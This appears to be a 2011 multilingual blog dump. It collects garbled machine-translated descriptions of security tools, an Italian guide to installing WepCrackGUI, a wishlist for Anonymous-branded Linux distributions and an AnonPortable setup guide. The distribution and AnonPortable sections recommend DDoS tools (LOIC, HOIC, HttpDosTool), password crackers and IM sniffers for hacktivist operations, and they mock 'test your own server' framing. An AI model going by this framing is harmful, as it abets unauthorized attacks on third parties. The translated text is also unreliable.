* Récupère actuellement connecté sur les utilisateurs, comptes d’utilisateurs configurés, disponibilité, etc
* Vous pouvez monter et d’explorer les ressources du réseau.
* Peut lancer des applications externes de tiers.
Exportations des résultats au format HTML, XML, CSV et TXT
* Supporte le Wake-On-LAN, l’arrêt à distance et les messages du réseau d’envoi.
* Récupère potentiellement toute l’information via WMI.
* Récupère les informations du Registre à distance, système de fichiers et de gestionnaire de services.
* Il est absolument gratuit, ne nécessite aucune installation et ne contient aucun adware / spyware / malware.

VASTO est un Virtualization Assessment Toolkit, un ensemble de modules Metasploit destiné à être utilisé comme un outil de test pour effectuer des tests de pénétration ou d’audit de sécurité des solutions de virtualisation. Il a été parrainé par réseau sécurisé et comprend les contributions des camarades hackers.

WhatWeb identifie les sites Web. Son but est de répondre à la question: «Qu’est-ce que ce site Web? ». WhatWeb reconnaît les technologies Web, y compris les systèmes de gestion de contenu (CMS), plateformes de blogs, statistiques / packages d’analyse, bibliothèques JavaScript, les serveurs Web et les appareils embarqués. WhatWeb a plus de 900 plugins, chacun à reconnaître quelque chose de différent. WhatWeb identifie également les numéros de version, adresses e-mail, des identifiants, des modules framework web, des erreurs SQL, et plus encore.

WhatWeb peut être furtif et rapide, ou approfondie, mais lente.WhatWeb prend en charge une agression de niveau pour contrôler le commerce entre la vitesse et la fiabilité. Lorsque vous visitez un site Web dans votre navigateur, l’opération comprend de nombreux indices de ce que les technologies du web sont alimenter ce site. Parfois d’une visite unique page web contient des informations suffisantes pour identifier ces sites mais si elle ne, WhatWeb peut interroger le site Web de plus. Le niveau par défaut de l’agression, dite «passive», est le plus rapide et ne nécessite qu’une seule requête HTTP d’un site web. Ceci est approprié pour la numérisation des sites Web publics. modes les plus agressifs ont été développés pour les tests de pénétration.

La plupart des plugins sont WhatWeb approfondie et reconnaître une gamme d’indices du plus subtil au évidente. Par exemple, la plupart des sites WordPress peuvent être identifiés par le méta-tag HTML, par exemple  », Mais une minorité de sites WordPress supprimer cette étiquette d’identification, mais cela ne nuit pas à WhatWeb. Le WhatWeb plugin WordPress a plus de 15 tests, qui comprennent la vérification de la favicon, les fichiers d’installation par défaut, les pages de connexion et de contrôle pour «/ wp-content / » dans les liens relatifs.

* Plus de 900 plugins
* Contrôle le compromis entre la vitesse / furtivité et la fiabilité
Plugins * comprennent par exemple les URL
* Optimisation de la performance. Contrôle le nombre de sites à analyser en même temps.
* Formats de journaux multiples: Mémoire (greppable), Verbose (lisible par l’homme), XML, JSON, MagicTree, RubyObject, MongoDB.
* Web récursive spidering
* Proxy soutien, y compris TOR
* En-têtes HTTP
* Une authentification HTTP basique
* Le contrôle de redirection web
* Nmap style plages d’adresses IP
* Fuzzy correspondant
* Résultat de sensibilisation certitude
* Custom plugins défini sur la ligne de commande

Hallebarde découvre les équilibreurs de charge HTTP. Il est utile pour l’audit de sécurité des applications web et pour les tests d’équilibrage de la charge de configuration.

Pour faire face à des charges de trafic lourd, les administrateurs de site Web, souvent installer des dispositifs d’équilibrage de charge. Ces machines se cacher (éventuellement) de nombreux serveurs web se cache derrière une adresse IP virtuelle. Ils reçoivent des demandes HTTP et les rediriger vers les vrais serveurs web afin de partager le trafic entre eux.
Hallebarde est un outil visant à découvrir de véritables serveurs derrière des adresses IP virtuelles.

iScanner est un outil gratuit open source vous permet de détecter et supprimer les codes malveillants et des pages web les virus de votre serveur Linux / Unix automatiquement et facilement.

Cet outil est programmé par iSecur1ty en utilisant un langage de programmation Ruby et il est disponible sous les termes de la GNU Affero General Public License 3.0.

S’il vous plaît noter que ce site est en construction. vérifier plus tard pour les mises à jour.

Caractéristiques actuelles:

* Codes malveillants Détection de pages Web. Cette inclure des balises iframe cachée, JavaScript, VBScript, ActiveX et les objets codes PHP.
* Log approfondies démontrent les fichiers infectés et les codes malveillants.
* Envoyer des rapports par email.
* Possibilité de nettoyer les pages web infectées automatiquement.
* Facilité de sauvegarde et de restauration du système pour les fichiers infectés.
* Simple et base de données modifiable en fonction de signature.
* Possibilité de mettre à jour la base de données et le programme facilement à partir de serveur dédié.
* Très options flexible et facile à utiliser.
scanner rapide * avec de bonnes performances.
* Oui, c’est GRATUIT!

Nmap (« Network Mapper ») est un libre et open source (licence) utilitaire pour l’exploration du réseau ou l’audit de sécurité. De nombreux systèmes et les administrateurs réseau trouverez également utile pour des tâches telles que l’inventaire de réseau, gestion des plannings de mise à niveau de service et d’accueil de surveillance ou de disponibilité de service. Nmap utilise des paquets IP de façon novatrice pour déterminer quels hôtes sont disponibles sur le réseau, quels services (nom de l’application et la version) ces hôtes offrent, les systèmes d’exploitation (et leurs versions), ils sont en cours d’exécution, ce type de filtres de paquets / pare-feu sont en cours d’utilisation, et des dizaines d’autres caractéristiques. Il a été conçu pour parcourir rapidement de grands réseaux, mais fonctionne très bien sur une cible unique. Nmap fonctionne sur tous les principaux systèmes d’exploitation informatique et officielle paquetages binaires sont disponibles pour Linux, Windows et Mac OS X.

Nmapsi4 est un système complet basé sur Qt4 Gui avec les objectifs de conception pour fournir une interface utilisateur complète pour nmap, en vue de la gestion du scanner toutes les options de sécurité de ce puissant net!

ProcNetMonitor est l’outil gratuit pour surveiller l’activité réseau de tous les processus en cours dans le système. Il affiche tous les ports d’un réseau ouvert (TCP / UDP) et les connexions réseau actives pour chaque processus. Il a avancé la couleur système basé analyse automatique pour le rendre facile de distinguer les processus réseau orienté des autres avec un seul coup d’œil sur la liste. Nouvelle version présente également caractéristique unique « Port Finder » qui le rend facile à rechercher port particulier dans tous les processus en cours en un seul clic. Il est également livré avec fonction d’exportation pour enregistrer la liste complète des processus de port à un fichier HTML standard pour l’analyse hors-ligne.
Toutes ces caractéristiques combinées font outil très efficace dans la lutte contre les chevaux de Troie et spywares installés sur le système qui envoient en continu des touches de clavier, les données de compte en ligne et autres informations sensibles à un serveur distant.

Sites web

Wepawet est un service pour la détection et l’analyse des logiciels malveillants sur le Web. Il gère actuellement Flash, JavaScript, et fil PDF


Written by camille

25 avril 2011 at 22 h 33 min

Publié dans Uncategorized


leave a comment »

Oggi vedremo come installare WepCrackGUI sulla distribuzione BackBox dedicata al penetration testing, innanzitutto scarichiamo il software dal SourceForge e scompattiamolo dopo preferiamo.

Da riga di comando dovremo installare Mono e GTK necessari per il corretto avvio di WepCrakGUI, iniziamo con Mono! Avviamo la riga di comando e digitiamo:

sudo apt-get install mono-devel

ad installazione avvenuta passiamo subito alle librerie grafiche GTK:

sudo apt-get install gtk-sharp2

perfetto ora potremo avviare WepCrackGUI col classico comando

sudo ./wepcrack

Articoli Similari
  1. Installare FluxBox in BackBox
  2. WepCrackGUI – Nuova Veste Grafica per aircrack-ng
  3. [Guida] Installiamo BackBox su Mac o su una Macchina Virtuale
  4. Installiamo WiRouter KeyRec su BackBox
  5. WEP Cracking, with BackBox & WepCrackGUI!

Written by camille

25 avril 2011 at 21 h 57 min

Publié dans Uncategorized

social engineer toolkit

leave a comment »

Written by camille

25 avril 2011 at 21 h 54 min

Publié dans Uncategorized


with one comment






[edit]Minimal Edition

Window Manager

XVesa (for simple Hardware)

TWM (classical and 2D; works even on lowest-end-Hardware!)

Fluxbox (simple and elegant. Will work on the oldest of computers.)


macchanger – Scrambles MAC address to maintain anonymity in public wireless networks


Python – Python. Popular programming language.

Python-tkinter (python-tk) – ???

Perl – Programming swiss army knife.

OpenJDK – Java programming, open-source version.

Geany – Very simple and usable multi-language programming tool. Able to compile things.

Flash Player – The web standard for rich multimedia content.

Wine Compatibility Layer – For windows stuff.

Mono C# – For Windows stuff coded with .NET.

Components for Perl/C-C++ scripting, etc, so people can code their own stuff (It’s free software, after all)

Full-disk encryption when installed, like TrueCrypt

apt-get and sypnatic





ProxyChains– Proxies everything.

(possible vpns built in)


     jhead (+other items that remove identifying metadata) – Sometimes, when writing a public pdf, you could give away your name,       and possibly address. This, and other tools prevents that.


wipe, shred, Secure-Delete suite – Deletes files so that they can never be recovered by adversaries

Steganography tools – So you can hide code in a funny cat picture.


BitchX – IRC bouncer, Client, and Server, all in one.

Irssi, xchat – Basic IRC clients. No bouncing.

EPIC – WTF? it’s a really awesome IRC, though.

xPDF (a small PDF reader!)

Abiword – Light word processing

Gnumeric – Light open-source spreadsheet

Twinkle, SIP/ZRTP – VoIP phone that encrypts the connection, not as safe as TOR, but with macchanger, detection is extremely difficult. For talking to people in a censored enviornment.

[edit]CodeBase Edition: (contains additional applications common to both AnonOS and Cherimoya)

(Everything from minimal) (or possilby later Wayland)

KDE 3.x (similar user experience as windows!)

Gnome (A little different, but it’s very easy anyway.)

VLC Media Player – Comes with every codec imaginable, plays anything you give it.

More Firefox addons (Or FIREKIPS to avoid copyright issues)

(a free, fully automatic proxy system; maybe Anonymous-proxes?)

Siphon (Add-On – Sync; ; recommered to preconfigure (monodirectional sync!), so that AnonOS-Users can choose best Addons and get them installed with just two clicks each…)

Mozilla Add-on Collector


All-in-One Sidebar

FoxyTunes (listen Ton AnonNewsRadio!)





AdBlock Plus

Update Notifier


Browser Masquerade (and/or « Modify Headers »)

Firefox Sync


WOT (Web of Trust)




Adblock Plus


YesScript (inclued a blacklist for NoScript, so that it protects more suchsessful; still allows manual override trough users…)





Certificate Patrol


Anonymous Personas (see )

Puff V2.0 (WINE) – Use steganography on, well, anything.

GIMP – Powerful image processor, open-source photoshop.

Inkscape – SVG processor?

Guake – Makes opening terminals much, much quicker.

Conky – Displays information about the computer in a convenient, easy to reach format.

Ubuntu Software Manager (Better package management than sypnatic)



Enigmail (GnuPG integration!)


XML Digital Signature Processing Tool

Certificate PAtrol

Mozilla Add-on Collector


Identity chooser

Display Mail User Agent

Update Notifier



Anonymous Personas

GnuPG(easy to use graphical interface!)

Ghostscript (create PDFs)

Sigil (ePub-Editor)

LibreOffice (openOffice is going to die out; free alternative!)

GIMP (for some Artwork-Creation 😉

Inkscape (vector-drawing!)


Unetbootin / isolinux

DBAN (Darik’s Boot and Nuke; a easy-to-use wiper!)

Console LOIC (The LOIC as a low-level-system; having ncruises-interace; including all the features form original!)

AnonOS – Cloner (just insert AnonOS and an empty CD-R in Writer’s tray and let it duplicate itself!)

Super Grub Disk (Repair MBR)

Inside Security (Virus Scan; Paritionating; lost of useful security/maintenance stuff)

Packet Management

mountable Program Packages (examle; see: )

[edit]Cherimoya (Multipurpose Offensive/Defensive)

Everything from CodeBase & minimal

Complete Anonymous Starter Kit, to turn newfags into safe and powerful anons.

Includes stuff here:

And includes a guide to Programming in Python, Java, HTML, CSS, PHP, Javascript, and C++

Productive (only Installed on USB/HDD or SSD if wished! not in live-CD -> lesser resources, shall work on low-end-hardware!)

Apache – Quintessential web server.

Offensive suite:

AimSniff – monitors AIM/MSN messages across a server


Wireshark – Full-featured network sniffer

Ethercap GTK


IM-Sniffer – snoop on MSN/AIM/Email contacts.

Packet Injectors

Airpwn – spoofs packets from a wireless network, effectively making YOU the server

Ettercap – Ettercap is a suite for man in the middle attacks on LAN. It features sniffing of live connections, content filtering on the fly and many other interesting tricks.

Network Stress “testing”

LOIC – Tests your “own” servers against a DDOS attack

hping3 – TCP/IP packet assembler/analyzer (PWNS LOIC at DDoSing. It even scrambles your IP.)

pyLOIC – Stress tester that works behind TOR.

HOIC – Multiple server stress tester.

Nessus – Network vulnerablity scanner, useful for finding exploits “that you immediately patch.”

Metasploit – Comprehensive network testing tool. Uses every exploit imaginable to test “your server’s” security.

w3af – Metasploit for the web. It finds exploits easily.

(possible wardialers, and free, anonymous VoIP)

Computer Security

Ophcrack – grabs windows passwords

rainbowcrack –

John the Ripper –

Hydra – uses a dictionary attack to check for weak passwords, compatible with many network protocols

nmap – Maps out a entire network.

GOCR – Optical character recognition tool (for captchas?)

(Add everything from BackTrack Linux, and from here:

Features specific to Cherimoya

Bittorrent update/package system – Apt-p2p looks promising, and greatly reduces server strain.

AppArmor – restricts power of applications with profiles for greater security. SELinux for Fedora.

Must have a way to be put on a persistent USB flash drive. Call it AnarKeys or Boomstick.

Broadcom 43xx Support – Current Ubuntu driver does not allow for packet injection when breaking wireless encryption. Former driver is a pain in the ass to find.

Icon set: Elementary – GNOME icon set, even looks better than Mac.

New GTK Theme that is dark and easy on the eyes

Firefox skin that turns it into FireKIPS (To avoid licensing issues)

404’ed screen: Show “CAN’T LET YOU DO THAT, FIREFOX”.

Awesomeface menu button

Sprachenen>ca GoogleKE

Mozilla Add-on Collector

[edit]AnonOS (Strictly Defensive)

Everything from CodeBase and Minimal

(before you add stuff here, find out what the goal of AnonOS is.)

Appearance Customizations:


Welcome to AnonOS!




Homepage (local; with dynamic stuff from external)

(more here:

Anonymous eMail Poviders (german; servers in egypt)

AnonOps: (

WebChat (recommered for beginners or short session)



Censorship – Testing:

AnonOS – Project

IRC-Chat (web)

Written by camille

25 avril 2011 at 21 h 51 min

Publié dans Uncategorized

security handboock

leave a comment »

Traduction (anglais > français)
Pour accéder à cette page « offline » plus tard w / un navigateur «non» à base de Trident (c.-à-IE), s’il vous plaît visitez et «Afficher les détails » cliquez pour voir le lien. Google Chrome / Chrome utilisateurs peuvent avoir à recharger la page après avoir cliqué sur le lien.
AnonPortable (fr) –
La source de cette page HTML5 (interrupteur en chinois) posté sur Google Buzz a été signé par @ xDD0Sx.
AnonPortable publié par @ AnonOpsCN est une version personnalisée de Portable I2P qui peuvent être utilisés pour les opérations au jour le jour de la hacktivistes Anonyme. S’il vous plaît n’hésitez pas à Hiram Ⓥ Jin un message qui sera automatiquement chiffrées avec une clé GPG hir public via PrivacyBox si vous avez toute question ou demande de fonctionnalité. (Tout commentaire posté ci-dessous peuvent ou ne peuvent pas être répondu.)
Vous pouvez maintenant le télécharger via BitTorrent instantanément, sans perdre une seconde. qBittorrent & Déluge est fortement recommandé que les clients multi plates-formes open source BitTorrent pour ceux d’entre vous qui ont des problèmes avec ceux installés sur votre ordinateur hôte.
AnonPortable (anglais par défaut | 137MB)
hachage 698d79a2a73ac14a64e4a3f7cf5cc1eb60452ef9 | md5 65051670f54c2409d065c7f053f4862d | sha1 eb850910a74787230eb59910157758c20b91733f
BitTorrent (plus rapide)
Tahoe-SYAL (CoralCDN)
Torrage (CoralCDN)
BitTorrent (Clientless)
Tahoe-SYAL (CoralCDN)
Magnet (Il faut au moins 1 non-webseed)
AnonPortable (chinois par défaut | 136MB)
hachage 924f8ec9c4db5590ed5d093e0df1b5d0d25ccba1 | md5 d7a68b07ee31b4add072355dc0585150 | sha1 3cb95ff717326c78065877aac9923ffcc75a72e0
BitTorrent (plus rapide)
Tahoe-SYAL (CoralCDN)
Torrage (CoralCDN)
BitTorrent (Clientless)
Tahoe-SYAL (CoralCDN)
Magnet (Il faut au moins 1 non-webseed)
Aircrack-ng 1.1
Bitcoin (cryptocurrency p2p)
Eraser Portable 5.8.8
FreeOTFE 5,21
GnuPT-Portable 2.1.4
GPGHash 2.5.7
HttpDosTool 3,6
I2P 0.8.4
I2P-Messenger 0.2.20 Beta (messagerie instantanée)
I2P 0.2.5-Bote (e-mail distribué)
iMule 1.4.5 (programme de partage de fichiers)
Java Runtime 6 update 24
Cannon ions de basse orbite
Magnetizer 1,50
Mozilla Firefox, Portable Edition 4.0 (pour des motifs prédéfinis FoxyProxy I2P + (live)-signets)
Beaucoup de sécurité Modules pour Firefox
PChat Portable 1,4 (fourchette xchat configuré pour se connecter anonymement à des serveurs IRC I2P)
PhotoRec 6.11
PuTTY 0.60
ramdisk 1,1
Robert 0.0.30-28 (client torrent avec de nombreuses options, uTorrent-like)
Sans pépins + Neodatis plugin
Simple I2P Chat (SIC) 0,2 (simple chat)
TestDisk 6.11
WinSCP 4.3.2 Portable
Pour enregistrer votre volume chiffré caché (s) créé par FreeOTFE dans le nuage, un client portables tels que les DropboxPortableAHK est une nécessité.
a. Extrait AnonPortable.en.7z aux médias clair amovible avec PeaZip Portable (530Mo après extraction)
Télécharger PeaZip Portable
Cliquez sur PeaZipPortable_x.xxpaf.exe pour l’extraire à chaque fois que vous désirez
Ouvrez le répertoire où vous avez extrait PeaZip Portable
Cliquez sur PeaZipPortable (. Exe)
Allez dans le répertoire où vous avez enregistré AnonPortable.en.7z
AnonPortable.en.7z Right-Click
Cliquez sur « Mot de passe / fichier clé »
Input « » comme mot de passe, confirmez-le et cliquez sur « Ok »
Appuyez sur F12 pour sélectionner le média amovible et clair Cliquez sur « Ok » (dans la langue par défaut de votre PC hôte) pour extraire AnonPortable.en.7z
b. Restez w sûre garantie de sécurité /
Si l’un des fichiers extraits de AnonPortable.en.7z est balayé comme un malware / trojan / virus par le service de votre PC hôte anti-virus (s), s’il vous plaît arrêter (les) vers le bas avant de l’extraire à nouveau AnonPortable.en.7z
Téléchargez autant de fichiers suspects que vous le souhaitez à VirusTotal ou Jotti pour l’assurance de la sécurité (Gardez à l’esprit que les outils de piratage sont souvent analysés comme un malware / trojan / virus)
c. Parcourez facilement I2P/HTTP/HTTPS sites w / un seul modèle pré-défini de FoxyProxy
Cliquez sur StartPortableApps (. Exe) dans le répertoire de AnonPortable
Cliquez sur « Mozilla Firefox, Portable Edition » dans le menu de
Tapez Ctrl + Maj + A pour ouvrir le Gestionnaire de Modules
Cliquez sur l’icône en forme de tournesol peu à côté du champ de recherche sur le dessus et puis cliquez sur « Check for Updates »
Redémarrez Mozilla Firefox après la fin de trouver ou d’installer toute mise à jour (toujours cliquez sur « Ok » lorsque vous êtes invité)
Faites un clic droit sur la petite icône peu barré FoxyProxy w / lignes rouges sur la barre d’état de Mozilla Firefox
Cliquez sur « Utiliser des estimations fondées sur leurs modes pré-définis et les priorités » en haut du menu de FoxyProxy
Cliquez sur l’icône du menu peu la barre des tâches de bureau
Cliquez sur « I2P Launcher » dans le menu (toujours cliquer sur « Ok » dans la langue par défaut de votre PC hôte lorsque vous êtes invité)
Connectez-vous et cliquez sur l’une des icônes du drapeau du pays si vous avez besoin de changer la langue par défaut de l’interface utilisateur Web
Consultez la section PEERS de la colonne à gauche et continuez de recharger la page jusqu’à ce que le « Active » pairs sont plus de 50/50 (Habituellement, cela prend moins de 15 minutes w / connexion Internet rapide)
Cliquez sur l’icône battant pavillon des Etats-Unis sur la barre d’état de Mozilla Firefox, puis cliquez sur l’icône du drapeau pays qui représente les paramètres régionaux que vous préférez, si vous avez besoin de changer la langue par défaut de l’interface utilisateur de Mozilla Firefox
d. Facilement chat w / Anons autres sur IRC via I2P
Cliquez sur StartPortableApps (. Exe)
Cliquez sur « Mozilla Firefox, Portable Edition » dans le menu de
Faites un clic droit sur l’icône FoxyProxy tout petit sur la barre d’état de Mozilla Firefox
curseur de votre souris au Point « IRC »
Cliquez sur « Utiliser un serveur proxy » IRC « pour toutes les URL »
Connectez-vous sur irc: / / (à savoir)
Cliquez sur « anonyme » à côté du chat et cliquer sur «changer de surnom … » changer votre pseudo
« Anonops / j # # opgfw« Type dans le domaine pour vous y joindre les salles de chat et OpGFW AnonOps
I2P Autres services intégrés
BitTorrent: I2PSnark
Courrier électronique: I2P-Bote, Susimail
a. Le thème (skin) de Mozilla Firefox ne s’affiche pas correctement (totalement vierge)
Tapez Ctrl + Maj + A pour ouvrir le Gestionnaire de Modules
Cliquez sur « Apparence » dans la barre de gauche
Cliquez sur « Désactiver » sous « Anonyme Pourquoi nous protestons »
Cliquez sur « Activer » sous « Anonyme Pourquoi nous protestons »

Written by camille

25 avril 2011 at 21 h 40 min

Publié dans manuels

Tagged with

Hello world!

leave a comment »

Welcome to After you read this, you should delete and write your own post, with a new title above. Or hit Add New on the left (of the admin dashboard) to start a fresh post.

Here are some suggestions for your first post.

  1. You can find new ideas for what to blog about by reading the Daily Post.
  2. Add PressThis to your browser. It creates a new blog post for you about any interesting  page you read on the web.
  3. Make some changes to this page, and then hit preview on the right. You can alway preview any post or edit you before you share it to the world.

Written by camille

25 avril 2011 at 21 h 32 min

Publié dans Uncategorized